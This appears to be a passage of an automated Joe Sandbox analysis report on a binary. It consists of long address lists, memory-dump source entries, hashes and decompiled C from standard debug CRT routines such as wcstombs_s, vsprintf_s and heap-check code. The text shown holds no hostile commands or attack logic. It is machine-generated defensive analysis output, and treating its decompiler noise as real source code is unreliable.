                            0x0042352f
                            0x00423532
                            0x00423532
                            0x00423535
                            0x00423535
                            0x0042358f
                            0x004235f5
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00423bb0
                            0x00000000
                            0x004238ad
                            0x004238ad
                            0x00000000
                            0x00000000
                            0x004238c9
                            0x004238c9
                            0x004238d3
                            0x004238d3
                            0x004238dd
                            0x004238dd
                            0x004238e3
                            0x004238e5
                            0x004238ea
                            0x004238f4
                            0x004238f4
                            0x004238f7
                            0x004238fb
                            0x004238fb
                            0x00423922
                            0x00423925
                            0x00423925
                            0x0042392a
                            0x0042394c
                            0x0042394c
                            0x00423952
                            0x00423974
                            0x00423974
                            0x00423977
                            0x004239be
                            0x004239be
                            0x004239c1
                            0x004239de
                            0x004239e2
                            0x004239ea
                            0x004239ea
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c3
                            0x004239c7
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397c
                            0x0042397f
                            0x0042399d
                            0x004239a9
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423981
                            0x00423985
                            0x0042398d
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423954
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x0042392c
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fb
                            0x004239fb
                            0x004239fe
                            0x00423a40
                            0x00423a40
                            0x00423a46
                            0x00423a4c
                            0x00423a52
                            0x00000000
                            0x00423a00
                            0x00423a00
                            0x00423a00
                            0x00423a07
                            0x00000000
                            0x00000000
                            0x00423a09
                            0x00423a09
                            0x00423a14
                            0x00423a1a
                            0x00423a1c
                            0x00423a22
                            0x00423a25
                            0x00423a27
                            0x00423a2d
                            0x00423a36
                            0x00423a3b
                            0x00423a58
                            0x00423a5b
                            0x00423a5b
                            0x00423a60
                            0x00423a65
                            0x00423a65
                            0x00423a6b
                            0x00423a6d
                            0x00423a73
                            0x00423a79
                            0x00423a79
                            0x00423a82
                            0x00423a82
                            0x00423a6b
                            0x00423a88
                            0x00423a8c
                            0x00423a9a
                            0x00423a9d
                            0x00423aa0
                            0x00423aa7
                            0x00423aa9
                            0x00423aa9
                            0x00423a8e
                            0x00423a8e
                            0x00423a8e
                            0x00423ab6
                            0x00423ab6
                            0x00423abc
                            0x00423abe
                            0x00423abe
                            0x00423ac5
                            0x00423acb
                            0x00423ace
                            0x00423ace
                            0x00423ace
                            0x00423ad4
                            0x00423ad7
                            0x00423ada
                            0x00423adc
                            0x00000000
                            0x00000000
                            0x00423ade
                            0x00423ae4
                            0x00423ae4
                            0x00423aea
                            0x00000000
                            0x00000000
                            0x00423aec
                            0x00423aec
                            0x00423aef
                            0x00423af2
                            0x00423af9
                            0x00423b00
                            0x00423b08
                            0x00423b0e
                            0x00423b11
                            0x00423b14
                            0x00423b1b
                            0x00423b27
                            0x00423b2d
                            0x00423b33
                            0x00423b3a
                            0x00423b3c
                            0x00423b42
                            0x00423b42
                            0x00423b48
                            0x00423b48
                            0x00423b4e
                            0x00423b57
                            0x00423b5c
                            0x00423b5f
                            0x00423ace
                            0x00423ace
                            0x00423ad4
                            0x00423ad7
                            0x00423ada
                            0x00423adc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423adc
                            0x00423ace
                            0x00423a0b
                            0x00423a0b
                            0x00423a12
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423a12
                            0x00000000
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00423139
                            0x00423139
                            0x0042313c
                            0x0042313f
                            0x00000000
                            0x00000000
                            0x00423144
                            0x00423147
                            0x0042314d
                            0x00000000
                            0x00000000
                            0x0042312e
                            0x00423131
                            0x00423134
                            0x00000000
                            0x00000000
                            0x00423123
                            0x00423126
                            0x00423129
                            0x00000000
                            0x00000000
                            0x00423152
                            0x00423152
                            0x00423155
                            0x00423155
                            0x00423158
                            0x00000000
                            0x00000000
                            0x0042315b
                            0x00000000
                            0x00000000
                            0x00422fcb
                            0x00422fcb
                            0x00422fcd
                            0x00422fdb
                            0x00422fcf
                            0x00422fcf
                            0x00422fcf
                            0x00422feb
                            0x00422ff8
                            0x00422ffa
                            0x00422fff
                            0x00423001
                            0x00423006
                            0x0042300b
                            0x0042300d
                            0x00423012
                            0x00423018
                            0x0042301a
                            0x0042301a
                            0x00423018
                            0x0042301b
                            0x00423022
                            0x00000000
                            0x00423024
                            0x00423029
                            0x00423045
                            0x0042304d
                            0x0042305a
                            0x0042305f
                            0x00423e74
                            0x00423e81
                            0x00423e81
                            0x00423022
                            0x00422fc5
                            0x00423db0
                            0x00423db7
                            0x00423dce
                            0x00423dce
                            0x00423dd8
                            0x00423dd8
                            0x00423dde
                            0x00423deb
                            0x00423ded
                            0x00423df2
                            0x00423df4
                            0x00423df9
                            0x00423dfe
                            0x00423e00
                            0x00423e05
                            0x00423e0b
                            0x00423e0d
                            0x00423e0d
                            0x00423e0b
                            0x00423e15
                            0x00423e60
                            0x00423e69
                            0x00423e6e
                            0x00423e17
                            0x00423e1c
                            0x00423e38
                            0x00423e40
                            0x00423e4d
                            0x00423e52
                            0x00423e52
                            0x00000000
                            0x00423e15
                            0x00423db9
                            0x00423dc0
                            0x00000000
                            0x00000000
                            0x00423dc2
                            0x00423dc2
                            0x00000000
                            0x00423dc2
                            0x00423bb0
                            0x0042344b
                            0x0042344b
                            0x00423451
                            0x00423458
                            0x0042345d
                            0x00423460
                            0x00000000
                            0x00423460

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
                            • String ID: $t@$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                            • API String ID: 909868375-2691574542
                            • Opcode ID: b4be556b2a9fa530e28e68b417de5dda2915d2e417a1d3ad4bd2f78f6899f3dd
                            • Instruction ID: 77bcd973a9c62ce4c445181408fd6ce7e09f2eaf3590880502c0f5b89ec6bee2
                            • Opcode Fuzzy Hash: b4be556b2a9fa530e28e68b417de5dda2915d2e417a1d3ad4bd2f78f6899f3dd
                            • Instruction Fuzzy Hash: 07A18FB1E002289BDB24CF55DD81BAEB3B5BB44305F5481DAE6096B281D73CAE84CF59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 0040CBF0
                            • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 0040CD2C
                            • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 0040CDA1
                            • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 0040CC8E
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: BytesCheck
                            • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                            • API String ID: 1653226792-1867057952
                            • Opcode ID: f50d4d1e409459c4dfa9250b754d0939ba2935ea4bad06eb35ed3732ffc45307
                            • Instruction ID: a24e33e754b2874eda48a497af397395c0bc1fde856454d26971f632cbd91872
                            • Opcode Fuzzy Hash: f50d4d1e409459c4dfa9250b754d0939ba2935ea4bad06eb35ed3732ffc45307
                            • Instruction Fuzzy Hash: 14610EB4E00105DBDB18CB84D8D5FBFB7B5AB48304F24822AE515BB3D1D278E842CB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E0041E154(signed int __eax) {
                            				intOrPtr _t45;
                            				void* _t50;
                            				signed int _t54;
                            				void* _t60;
                            				signed int _t67;
                            				signed int _t69;
                            				signed int _t71;
                            				signed int _t73;
                            				signed int _t79;
                            				void* _t80;
                            				void* _t81;
                            				void* _t82;
                            				void* _t84;
                            				void* _t85;
                            				void* _t94;
                            
                            				_t85 = _t84 + 0x10;
                            				 *(_t82 - 0xc) = __eax;
                            				if( *(_t82 - 0xc) != 0xffffffff) {
                            					_t71 =  *(_t82 - 0xc) + 1;
                            					 *(_t82 - 0xc) = _t71;
                            					__eflags =  *(_t82 + 0xc);
                            					if( *(_t82 + 0xc) == 0) {
                            						L27:
                            						__eflags =  *(_t82 + 8);
                            						if( *(_t82 + 8) != 0) {
                            							 *( *(_t82 + 8)) =  *(_t82 - 0xc);
                            						}
                            						_t45 =  *((intOrPtr*)(_t82 - 4));
                            						L30:
                            						return _t45;
                            					}
                            					__eflags =  *(_t82 - 0xc) -  *(_t82 + 0x10);
                            					if( *(_t82 - 0xc) <=  *(_t82 + 0x10)) {
                            						L26:
                            						_t73 =  *(_t82 + 0xc) +  *(_t82 - 0xc);
                            						__eflags = _t73;
                            						 *((char*)(_t73 - 1)) = 0;
                            						goto L27;
                            					}
                            					__eflags =  *((intOrPtr*)(_t82 + 0x18)) - 0xffffffff;
                            					if( *((intOrPtr*)(_t82 + 0x18)) == 0xffffffff) {
                            						L25:
                            						 *(_t82 - 0xc) =  *(_t82 + 0x10);
                            						 *((intOrPtr*)(_t82 - 4)) = 0x50;
                            						goto L26;
                            					}
                            					 *( *(_t82 + 0xc)) = 0;
                            					__eflags =  *(_t82 + 0x10) - 0xffffffff;
                            					if( *(_t82 + 0x10) != 0xffffffff) {
                            						__eflags =  *(_t82 + 0x10) - 0x7fffffff;
                            						if( *(_t82 + 0x10) != 0x7fffffff) {
                            							__eflags =  *(_t82 + 0x10) - 1;
                            							if( *(_t82 + 0x10) > 1) {
                            								__eflags =  *0x60a658 -  *(_t82 + 0x10) - 1; // 0xffffffff
                            								if(__eflags >= 0) {
                            									_t67 =  *(_t82 + 0x10) - 1;
                            									__eflags = _t67;
                            									 *(_t82 - 0x2c) = _t67;
                            								} else {
                            									_t54 =  *0x60a658; // 0xffffffff
                            									 *(_t82 - 0x2c) = _t54;
                            								}
                            								_t71 =  *(_t82 - 0x2c);
                            								_t52 =  *(_t82 + 0xc) + 1;
                            								__eflags =  *(_t82 + 0xc) + 1;
                            								E00412D20(_t80, _t52, 0xfe, _t71);
                            								_t85 = _t85 + 0xc;
                            							}
                            						}
                            					}
                            					_t65 =  *(_t82 + 0x10);
                            					__eflags =  *(_t82 - 0xc) -  *(_t82 + 0x10);
                            					asm("sbb edx, edx");
                            					 *(_t82 - 0x18) =  ~_t71;
                            					if( *(_t82 - 0xc) ==  *(_t82 + 0x10)) {
                            						_push(L"sizeInBytes > retsize");
                            						_push(0);
                            						_push(0x157);
                            						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
                            						_push(2);
                            						_t50 = L0040E1A0();
                            						_t85 = _t85 + 0x14;
                            						__eflags = _t50 - 1;
                            						if(_t50 == 1) {
                            							asm("int3");
                            						}
                            					}
                            					__eflags =  *(_t82 - 0x18);
                            					if( *(_t82 - 0x18) != 0) {
                            						goto L25;
                            					} else {
                            						 *((intOrPtr*)(L0040EC70(_t65))) = 0x22;
                            						E00411A50(_t60, _t65, _t80, _t81, L"sizeInBytes > retsize", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x157, 0);
                            						_t45 = 0x22;
                            						goto L30;
                            					}
                            				}
                            				if( *(_t82 + 0xc) != 0) {
                            					 *( *(_t82 + 0xc)) = 0;
                            					if( *(_t82 + 0x10) != 0xffffffff &&  *(_t82 + 0x10) != 0x7fffffff &&  *(_t82 + 0x10) > 1) {
                            						_t94 =  *0x60a658 -  *(_t82 + 0x10) - 1; // 0xffffffff
                            						if(_t94 >= 0) {
                            							_t79 =  *(_t82 + 0x10) - 1;
                            							__eflags = _t79;
                            							 *(_t82 - 0x28) = _t79;
                            						} else {
                            							_t69 =  *0x60a658; // 0xffffffff
                            							 *(_t82 - 0x28) = _t69;
                            						}
                            						_t61 =  *(_t82 + 0xc) + 1;
                            						E00412D20(_t80,  *(_t82 + 0xc) + 1, 0xfe,  *(_t82 - 0x28));
                            					}
                            				}
                            				_t45 =  *((intOrPtr*)(L0040EC70(_t61)));
                            				goto L30;
                            			}


















                            0x0041e154
                            0x0041e157
                            0x0041e15e
                            0x0041e1ca
                            0x0041e1cd
                            0x0041e1d0
                            0x0041e1d4
                            0x0041e2c1
                            0x0041e2c1
                            0x0041e2c5
                            0x0041e2cd
                            0x0041e2cd
                            0x0041e2cf
                            0x0041e2d2
                            0x0041e2d5
                            0x0041e2d5
                            0x0041e1dd
                            0x0041e1e0
                            0x0041e2b7
                            0x0041e2ba
                            0x0041e2ba
                            0x0041e2bd
                            0x00000000
                            0x0041e2bd
                            0x0041e1e6
                            0x0041e1ea
                            0x0041e2aa
                            0x0041e2ad
                            0x0041e2b0
                            0x00000000
                            0x0041e2b0
                            0x0041e1f3
                            0x0041e1f6
                            0x0041e1fa
                            0x0041e1fc
                            0x0041e203
                            0x0041e205
                            0x0041e209
                            0x0041e211
                            0x0041e217
                            0x0041e226
                            0x0041e226
                            0x0041e229
                            0x0041e219
                            0x0041e219
                            0x0041e21e
                            0x0041e21e
                            0x0041e22c
                            0x0041e238
                            0x0041e238
                            0x0041e23c
                            0x0041e241
                            0x0041e241
                            0x0041e209
                            0x0041e203
                            0x0041e244
                            0x0041e247
                            0x0041e24a
                            0x0041e24e
                            0x0041e251
                            0x0041e253
                            0x0041e258
                            0x0041e25a
                            0x0041e25f
                            0x0041e264
                            0x0041e266
                            0x0041e26b
                            0x0041e26e
                            0x0041e271
                            0x0041e273
                            0x0041e273
                            0x0041e271
                            0x0041e274
                            0x0041e278
                            0x00000000
                            0x0041e27a
                            0x0041e27f
                            0x0041e29b
                            0x0041e2a3
                            0x00000000
                            0x0041e2a3
                            0x0041e278
                            0x0041e164
                            0x0041e169
                            0x0041e170
                            0x0041e187
                            0x0041e18d
                            0x0041e19d
                            0x0041e19d
                            0x0041e1a0
                            0x0041e18f
                            0x0041e18f
                            0x0041e195
                            0x0041e195
                            0x0041e1af
                            0x0041e1b3
                            0x0041e1b8
                            0x0041e170
                            0x0041e1c0
                            0x00000000

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: _memset$__invalid_parameter
                            • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$sizeInBytes > retsize
                            • API String ID: 2178901135-56445615
                            • Opcode ID: 8315eaa6a44a0fd2ca9c27235469cc1f29bc26d8b860ca5f47152a015c513efb
                            • Instruction ID: e4875fb2adf0fffae21824f7cc3b30243e61e59fa90d6ae01dfe7a491b9f6918
                            • Opcode Fuzzy Hash: 8315eaa6a44a0fd2ca9c27235469cc1f29bc26d8b860ca5f47152a015c513efb
                            • Instruction Fuzzy Hash: BD418D34D04249EBCB14CFAAC845BEE7771BB40314F14866AEC252B3D1C3799991CF49
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 51%
                            			E0041C5BC(void* __ecx) {
                            				signed int _t42;
                            				signed int _t43;
                            				signed int _t49;
                            				void* _t53;
                            				void* _t58;
                            				signed int _t75;
                            				void* _t80;
                            				void* _t81;
                            				void* _t82;
                            				void* _t84;
                            				void* _t85;
                            
                            				_t42 = E0041C2F0(_t58, _t80, _t81, E004212D0,  *((intOrPtr*)(_t82 + 8)),  *((intOrPtr*)(_t82 + 0xc)),  *((intOrPtr*)(_t82 + 0x10)),  *((intOrPtr*)(_t82 + 0x14)), __ecx);
                            				_t85 = _t84 + 0x18;
                            				 *(_t82 - 4) = _t42;
                            				if( *(_t82 - 4) < 0) {
                            					 *((char*)( *((intOrPtr*)(_t82 + 8)))) = 0;
                            					if( *((intOrPtr*)(_t82 + 0xc)) != 0xffffffff &&  *((intOrPtr*)(_t82 + 0xc)) != 0x7fffffff &&  *((intOrPtr*)(_t82 + 0xc)) > 1) {
                            						E00412D20(_t80,  *((intOrPtr*)(_t82 + 8)) + 1, 0xfe,  *((intOrPtr*)(_t82 - 0x18)));
                            						_t85 = _t85 + 0xc;
                            					}
                            				}
                            				if( *(_t82 - 4) != 0xfffffffe) {
                            					L17:
                            					__eflags =  *(_t82 - 4);
                            					if( *(_t82 - 4) >= 0) {
                            						__eflags =  *((intOrPtr*)(_t82 + 0xc)) - 0xffffffff;
                            						if( *((intOrPtr*)(_t82 + 0xc)) != 0xffffffff) {
                            							__eflags =  *((intOrPtr*)(_t82 + 0xc)) - 0x7fffffff;
                            							if( *((intOrPtr*)(_t82 + 0xc)) != 0x7fffffff) {
                            								__eflags =  *(_t82 - 4) + 1 -  *((intOrPtr*)(_t82 + 0xc));
                            								if( *(_t82 - 4) + 1 <  *((intOrPtr*)(_t82 + 0xc))) {
                            									__eflags =  *0x60a658 -  *((intOrPtr*)(_t82 + 0xc)) -  *(_t82 - 4) + 1; // 0xffffffff
                            									if(__eflags >= 0) {
                            										_t75 =  *((intOrPtr*)(_t82 + 0xc)) -  *(_t82 - 4) + 1;
                            										__eflags = _t75;
                            										 *(_t82 - 0x20) = _t75;
                            									} else {
                            										_t49 =  *0x60a658; // 0xffffffff
                            										 *(_t82 - 0x20) = _t49;
                            									}
                            									E00412D20(_t80,  *((intOrPtr*)(_t82 + 8)) +  *(_t82 - 4) + 1, 0xfe,  *(_t82 - 0x20));
                            								}
                            							}
                            						}
                            					}
                            					_t43 =  *(_t82 - 4);
                            					L26:
                            					return _t43;
                            				}
                            				if(0 == 0) {
                            					 *((intOrPtr*)(_t82 - 0x1c)) = 0;
                            				} else {
                            					 *((intOrPtr*)(_t82 - 0x1c)) = 1;
                            				}
                            				_t66 =  *((intOrPtr*)(_t82 - 0x1c));
                            				 *((intOrPtr*)(_t82 - 0x10)) =  *((intOrPtr*)(_t82 - 0x1c));
                            				if( *((intOrPtr*)(_t82 - 0x10)) == 0) {
                            					_push(L"(\"Buffer too small\", 0)");
                            					_push(0);
                            					_push(0xf4);
                            					_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\vsprintf.c");
                            					_push(2);
                            					_t53 = L0040E1A0();
                            					_t85 = _t85 + 0x14;
                            					if(_t53 == 1) {
                            						asm("int3");
                            					}
                            				}
                            				if( *((intOrPtr*)(_t82 - 0x10)) != 0) {
                            					goto L17;
                            				} else {
                            					 *((intOrPtr*)(L0040EC70(_t66))) = 0x22;
                            					_t43 = E00411A50(_t58, _t66, _t80, _t81, L"(\"Buffer too small\", 0)", L"_vsprintf_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\vsprintf.c", 0xf4, 0) | 0xffffffff;
                            					goto L26;
                            				}
                            			}














                            0x0041c5d2
                            0x0041c5d7
                            0x0041c5da
                            0x0041c5e1
                            0x0041c5e6
                            0x0041c5ed
                            0x0041c630
                            0x0041c635
                            0x0041c635
                            0x0041c5ed
                            0x0041c63c
                            0x0041c6b3
                            0x0041c6b3
                            0x0041c6b7
                            0x0041c6b9
                            0x0041c6bd
                            0x0041c6bf
                            0x0041c6c6
                            0x0041c6ce
                            0x0041c6d1
                            0x0041c6de
                            0x0041c6e4
                            0x0041c6f9
                            0x0041c6f9
                            0x0041c6fb
                            0x0041c6e6
                            0x0041c6e6
                            0x0041c6eb
                            0x0041c6eb
                            0x0041c712
                            0x0041c717
                            0x0041c6d1
                            0x0041c6c6
                            0x0041c6bd
                            0x0041c71a
                            0x0041c71d
                            0x0041c720
                            0x0041c720
                            0x0041c640
                            0x0041c64b
                            0x0041c642
                            0x0041c642
                            0x0041c642
                            0x0041c652
                            0x0041c655
                            0x0041c65c
                            0x0041c65e
                            0x0041c663
                            0x0041c665
                            0x0041c66a
                            0x0041c66f
                            0x0041c671
                            0x0041c676
                            0x0041c67c
                            0x0041c67e
                            0x0041c67e
                            0x0041c67c
                            0x0041c683
                            0x00000000
                            0x0041c685
                            0x0041c68a
                            0x0041c6ae
                            0x00000000
                            0x0041c6ae

                            APIs
                            • __vsnprintf_helper.LIBCMTD ref: 0041C5D2
                              • Part of subcall function 0041C2F0: __invalid_parameter.LIBCMTD ref: 0041C352
                            • _memset.LIBCMT ref: 0041C630
                            • __invalid_parameter.LIBCMTD ref: 0041C6A6
                            • _memset.LIBCMT ref: 0041C712
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __invalid_parameter_memset$__vsnprintf_helper
                            • String ID: ("Buffer too small", 0)$_vsprintf_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c
                            • API String ID: 1595796382-1462273229
                            • Opcode ID: 592c0f48f954fb9ebe11dfddf1b362e9e872a25f08b95c8ecc3bfe96cadff3c0
                            • Instruction ID: e5aabb48354373db1f95fa7001bc490cd7160857c309ed050542804df0600054
                            • Opcode Fuzzy Hash: 592c0f48f954fb9ebe11dfddf1b362e9e872a25f08b95c8ecc3bfe96cadff3c0
                            • Instruction Fuzzy Hash: A941A730D80209EFCF14CF58CD81BEE7371AB44328F20962AE429672D1D7799A81CF59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E0040D6F7() {
                            				intOrPtr _t54;
                            				void* _t61;
                            				intOrPtr _t68;
                            				void* _t70;
                            				void* _t98;
                            				void* _t99;
                            				signed int _t100;
                            				void* _t102;
                            				void* _t105;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					 *(_t100 - 4) =  *(_t100 - 4) + 1;
                            					if( *((intOrPtr*)( *((intOrPtr*)(_t100 + 0xc)) + 0x10)) >= 0x10) {
                            						 *((intOrPtr*)(_t100 - 0x6c)) = 0x10;
                            					} else {
                            						_t6 =  *((intOrPtr*)(_t100 + 0xc)) + 0x10; // 0x2
                            						 *((intOrPtr*)(_t100 - 0x6c)) =  *_t6;
                            					}
                            					if( *(_t100 - 4) >=  *((intOrPtr*)(_t100 - 0x6c))) {
                            						break;
                            					}
                            					L5:
                            					 *(_t100 - 0x61) =  *((intOrPtr*)( *((intOrPtr*)(_t100 + 0xc)) +  *(_t100 - 4) + 0x20));
                            					if(E0040D3B0(_t100 - 0x60) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(E0040D3B0(_t100 - 0x60))) + 0xac)) <= 1) {
                            						_t54 = E00416AD0(E0040D3B0(_t100 - 0x60),  *(_t100 - 0x61) & 0x000000ff, 0x157);
                            						_t105 = _t102 + 0xc;
                            						 *((intOrPtr*)(_t100 - 0x70)) = _t54;
                            					} else {
                            						_t68 = E00416B80( *(_t100 - 0x61) & 0x000000ff, 0x157, E0040D3B0(_t100 - 0x60));
                            						_t105 = _t102 + 0xc;
                            						 *((intOrPtr*)(_t100 - 0x70)) = _t68;
                            					}
                            					if( *((intOrPtr*)(_t100 - 0x70)) == 0) {
                            						 *(_t100 - 0x74) = 0x20;
                            					} else {
                            						 *(_t100 - 0x74) =  *(_t100 - 0x61) & 0x000000ff;
                            					}
                            					 *((char*)(_t100 +  *(_t100 - 4) - 0x50)) =  *(_t100 - 0x74);
                            					 *((intOrPtr*)(_t100 - 0x68)) =  *((intOrPtr*)(L0040EC70( *(_t100 - 0x74))));
                            					 *((intOrPtr*)(L0040EC70( *(_t100 - 0x74)))) = 0;
                            					_t84 = _t100 +  *(_t100 - 4) * 3 - 0x3c;
                            					_t61 = E00416A70(_t100 +  *(_t100 - 4) * 3 - 0x3c, _t100 +  *(_t100 - 4) * 3 - 0x3c, 0x31 -  *(_t100 - 4) * 3, "%.2X ",  *(_t100 - 0x61) & 0x000000ff);
                            					_t102 = _t105 + 0x10;
                            					if(_t61 < 0) {
                            						E0040D870( *((intOrPtr*)(L0040EC70(_t84))), 0x16, 0x22, L"(*_errno())", L"_printMemBlockData", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgheap.c", 0x963, 0);
                            						_t102 = _t102 + 0x20;
                            					}
                            					 *((intOrPtr*)(L0040EC70(_t84))) =  *((intOrPtr*)(_t100 - 0x68));
                            				}
                            				L15:
                            				_t91 =  *(_t100 - 4);
                            				 *((char*)(_t100 +  *(_t100 - 4) - 0x50)) = 0;
                            				_push(_t100 - 0x3c);
                            				if(L00412F90(0, 0, 0, 0, " Data: <%s> %s\n", _t100 - 0x50) == 1) {
                            					asm("int3");
                            				}
                            				return E00416CA0(E0040D380(_t100 - 0x60), _t70,  *(_t100 - 8) ^ _t100, _t91, _t98, _t99);
                            			}












                            0x0040d6f7
                            0x0040d6f7
                            0x0040d6f7
                            0x0040d6fd
                            0x0040d707
                            0x0040d714
                            0x0040d709
                            0x0040d70c
                            0x0040d70f
                            0x0040d70f
                            0x0040d721
                            0x00000000
                            0x00000000
                            0x0040d727
                            0x0040d730
                            0x0040d73d
                            0x0040d785
                            0x0040d78a
                            0x0040d78d
                            0x0040d752
                            0x0040d765
                            0x0040d76a
                            0x0040d76d
                            0x0040d76d
                            0x0040d794
                            0x0040d79f
                            0x0040d796
                            0x0040d79a
                            0x0040d79a
                            0x0040d7ac
                            0x0040d7b7
                            0x0040d7bf
                            0x0040d7e3
                            0x0040d7e8
                            0x0040d7ed
                            0x0040d7f2
                            0x0040d816
                            0x0040d81b
                            0x0040d81b
                            0x0040d826
                            0x0040d826
                            0x0040d82d
                            0x0040d82d
                            0x0040d830
                            0x0040d838
                            0x0040d855
                            0x0040d857
                            0x0040d857
                            0x0040d86d

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
